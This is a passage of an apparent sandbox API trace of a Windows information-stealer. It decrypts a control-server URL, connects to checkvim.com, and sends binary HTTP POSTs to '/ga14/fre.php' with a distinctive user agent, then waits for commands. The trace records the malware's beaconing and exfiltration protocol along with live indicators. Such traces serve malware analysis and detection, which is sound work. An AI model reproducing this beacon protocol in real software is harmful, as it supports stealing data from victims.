dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0328.304] GetProcessHeap () returned 0x840000 [0328.304] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0328.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.305] CryptDecrypt (in: hKey=0x87e730, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fd88, pdwDataLen=0x19f9a4 | out: pbData=0x87fd88, pdwDataLen=0x19f9a4) returned 1 [0328.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.312] CryptDestroyKey (hKey=0x87e730) returned 1 [0328.313] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.313] CryptReleaseContext (hProv=0x870128, dwFlags=0x0) returned 1 [0328.313] GetProcessHeap () returned 0x840000 [0328.313] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0328.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0328.314] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0328.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0328.315] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0328.316] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0328.316] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0328.316] GetProcessHeap () returned 0x840000 [0328.316] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x8713a8 [0328.316] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0328.319] GetProcessHeap () returned 0x840000 [0328.319] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871be8 [0328.319] socket (af=2, type=1, protocol=6) returned 0x5ac [0328.319] connect (s=0x5ac, name=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0328.389] FreeAddrInfoW (pAddrInfo=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878c68*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0328.389] GetProcessHeap () returned 0x840000 [0328.389] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f710 [0328.389] GetProcessHeap () returned 0x840000 [0328.389] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8875c8 [0328.390] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0328.391] wvsprintfA (in: param_1=0x8875c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0328.391] GetProcessHeap () returned 0x840000 [0328.391] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0328.391] GetProcessHeap () returned 0x840000 [0328.392] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0328.392] GetProcessHeap () returned 0x840000 [0328.392] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f998 [0328.392] GetProcessHeap () returned 0x840000 [0328.392] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8875c8 [0328.393] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0328.394] wvsprintfA (in: param_1=0x8875c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0328.394] GetProcessHeap () returned 0x840000 [0328.394] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0328.394] GetProcessHeap () returned 0x840000 [0328.394] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0328.394] send (s=0x5ac, buf=0x873a58*, len=237, flags=0) returned 237 [0328.395] send (s=0x5ac, buf=0x87eb58*, len=159, flags=0) returned 159 [0328.395] GetProcessHeap () returned 0x840000 [0328.395] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0328.395] recv (in: s=0x5ac, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0328.757] GetProcessHeap () returned 0x840000 [0328.757] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0328.757] GetProcessHeap () returned 0x840000 [0328.757] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f998 | out: hHeap=0x840000) returned 1 [0328.757] GetProcessHeap () returned 0x840000 [0328.757] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0328.757] GetProcessHeap () returned 0x840000 [0328.757] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f710 | out: hHeap=0x840000) returned 1 [0328.757] closesocket (s=0x5ac) returned 0 [0328.757] GetProcessHeap () returned 0x840000 [0328.757] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871be8 | out: hHeap=0x840000) returned 1 [0328.757] GetProcessHeap () returned 0x840000 [0328.757] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0328.757] GetProcessHeap () returned 0x840000 [0328.757] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd88 | out: hHeap=0x840000) returned 1 [0328.757] GetProcessHeap () returned 0x840000 [0328.757] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8713a8 | out: hHeap=0x840000) returned 1 [0328.758] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xf84) returned 0x5ac [0328.759] Sleep (dwMilliseconds=0xea60) [0328.761] GetProcessHeap () returned 0x840000 [0328.761] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fd40 [0328.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.763] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0328.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.769] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0328.775] GetProcessHeap () returned 0x840000 [0328.775] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0328.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.776] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9b0) returned 1 [0328.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.777] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0328.778] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.778] CryptSetKeyParam (hKey=0x87e9b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0328.778] GetProcessHeap () returned 0x840000 [0328.778] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0328.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.779] CryptDecrypt (in: hKey=0x87e9b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fd40, pdwDataLen=0x19f9a4 | out: pbData=0x87fd40, pdwDataLen=0x19f9a4) returned 1 [0328.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.780] CryptDestroyKey (hKey=0x87e9b0) returned 1 [0328.780] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.780] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0328.780] GetProcessHeap () returned 0x840000 [0328.780] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0328.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0328.781] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0328.782] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0328.782] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0328.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0328.783] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0328.783] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0328.784] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0328.784] GetProcessHeap () returned 0x840000 [0328.784] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871420 [0328.784] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0328.784] GetProcessHeap () returned 0x840000 [0328.784] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871420 | out: hHeap=0x840000) returned 1 [0328.784] GetProcessHeap () returned 0x840000 [0328.784] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0328.784] GetProcessHeap () returned 0x840000 [0328.784] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fd40 | out: hHeap=0x840000) returned 1 [0328.784] GetProcessHeap () returned 0x840000 [0328.784] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb48 [0328.785] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.785] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0328.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.789] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fe80) returned 1 [0328.796] GetProcessHeap () returned 0x840000 [0328.796] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0328.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.797] CryptImportKey (in: hProv=0x86fe80, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e370) returned 1 [0328.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.798] CryptSetKeyParam (hKey=0x87e370, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0328.799] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.799] CryptSetKeyParam (hKey=0x87e370, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0328.799] GetProcessHeap () returned 0x840000 [0328.799] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0328.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.800] CryptDecrypt (in: hKey=0x87e370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb48, pdwDataLen=0x19f9a4 | out: pbData=0x87fb48, pdwDataLen=0x19f9a4) returned 1 [0328.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.801] CryptDestroyKey (hKey=0x87e370) returned 1 [0328.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0328.802] CryptReleaseContext (hProv=0x86fe80, dwFlags=0x0) returned 1 [0328.802] GetProcessHeap () returned 0x840000 [0328.802] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0328.802] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0328.803] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0328.803] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0328.804] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0328.804] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0328.804] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0328.804] GetProcessHeap () returned 0x840000 [0328.804] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871218 [0328.804] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871240*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0328.806] GetProcessHeap () returned 0x840000 [0328.806] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871ca8 [0328.806] socket (af=2, type=1, protocol=6) returned 0x5b0 [0328.806] connect (s=0x5b0, name=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0328.873] FreeAddrInfoW (pAddrInfo=0x871240*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a70*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0328.873] GetProcessHeap () returned 0x840000 [0328.873] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fa40 [0328.873] GetProcessHeap () returned 0x840000 [0328.873] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8875c8 [0328.874] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0328.875] wvsprintfA (in: param_1=0x8875c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0328.875] GetProcessHeap () returned 0x840000 [0328.875] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87f4f0 [0328.875] GetProcessHeap () returned 0x840000 [0328.876] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0328.876] GetProcessHeap () returned 0x840000 [0328.876] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87fea8 [0328.876] GetProcessHeap () returned 0x840000 [0328.876] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8875c8 [0328.876] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0328.877] wvsprintfA (in: param_1=0x8875c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0328.877] GetProcessHeap () returned 0x840000 [0328.877] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0328.877] GetProcessHeap () returned 0x840000 [0328.877] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8875c8 | out: hHeap=0x840000) returned 1 [0328.877] send (s=0x5b0, buf=0x873a58*, len=237, flags=0) returned 237 [0328.877] send (s=0x5b0, buf=0x87eb58*, len=159, flags=0) returned 159 [0328.877] GetProcessHeap () returned 0x840000 [0328.878] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0328.878] recv (in: s=0x5b0, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0329.265] GetProcessHeap () returned 0x840000 [0329.265] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0329.265] GetProcessHeap () returned 0x840000 [0329.265] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fea8 | out: hHeap=0x840000) returned 1 [0329.265] GetProcessHeap () returned 0x840000 [0329.265] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f4f0 | out: hHeap=0x840000) returned 1 [0329.265] GetProcessHeap () returned 0x840000 [0329.265] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fa40 | out: hHeap=0x840000) returned 1 [0329.265] closesocket (s=0x5b0) returned 0 [0329.266] GetProcessHeap () returned 0x840000 [0329.266] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871ca8 | out: hHeap=0x840000) returned 1 [0329.266] GetProcessHeap () returned 0x840000 [0329.266] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0329.266] GetProcessHeap () returned 0x840000 [0329.266] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0329.266] GetProcessHeap () returned 0x840000 [0329.266] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0329.266] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x120c) returned 0x5b0 [0329.268] Sleep (dwMilliseconds=0xea60) [0329.284] GetProcessHeap () returned 0x840000 [0329.284] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fab8 [0329.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.285] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0329.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.290] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0329.296] GetProcessHeap () returned 0x840000 [0329.296] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0329.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.297] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7f0) returned 1 [0329.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.298] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0329.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.299] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0329.299] GetProcessHeap () returned 0x840000 [0329.299] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0329.300] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.300] CryptDecrypt (in: hKey=0x87e7f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fab8, pdwDataLen=0x19f9a4 | out: pbData=0x87fab8, pdwDataLen=0x19f9a4) returned 1 [0329.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.301] CryptDestroyKey (hKey=0x87e7f0) returned 1 [0329.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.302] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0329.302] GetProcessHeap () returned 0x840000 [0329.302] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0329.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0329.303] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0329.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0329.303] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0329.304] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0329.304] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0329.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0329.305] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0329.305] GetProcessHeap () returned 0x840000 [0329.305] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0329.305] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0329.306] GetProcessHeap () returned 0x840000 [0329.306] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0329.306] GetProcessHeap () returned 0x840000 [0329.306] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0329.306] GetProcessHeap () returned 0x840000 [0329.306] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fab8 | out: hHeap=0x840000) returned 1 [0329.306] GetProcessHeap () returned 0x840000 [0329.306] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0329.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.307] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0329.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.311] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fb50) returned 1 [0329.317] GetProcessHeap () returned 0x840000 [0329.317] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0329.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.318] CryptImportKey (in: hProv=0x86fb50, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e370) returned 1 [0329.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.319] CryptSetKeyParam (hKey=0x87e370, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0329.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.320] CryptSetKeyParam (hKey=0x87e370, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0329.320] GetProcessHeap () returned 0x840000 [0329.320] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0329.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.320] CryptDecrypt (in: hKey=0x87e370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0329.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.321] CryptDestroyKey (hKey=0x87e370) returned 1 [0329.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0329.322] CryptReleaseContext (hProv=0x86fb50, dwFlags=0x0) returned 1 [0329.322] GetProcessHeap () returned 0x840000 [0329.322] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0329.322] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0329.323] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0329.323] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0329.324] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0329.324] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0329.324] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0329.324] GetProcessHeap () returned 0x840000 [0329.325] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871290 [0329.325] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, 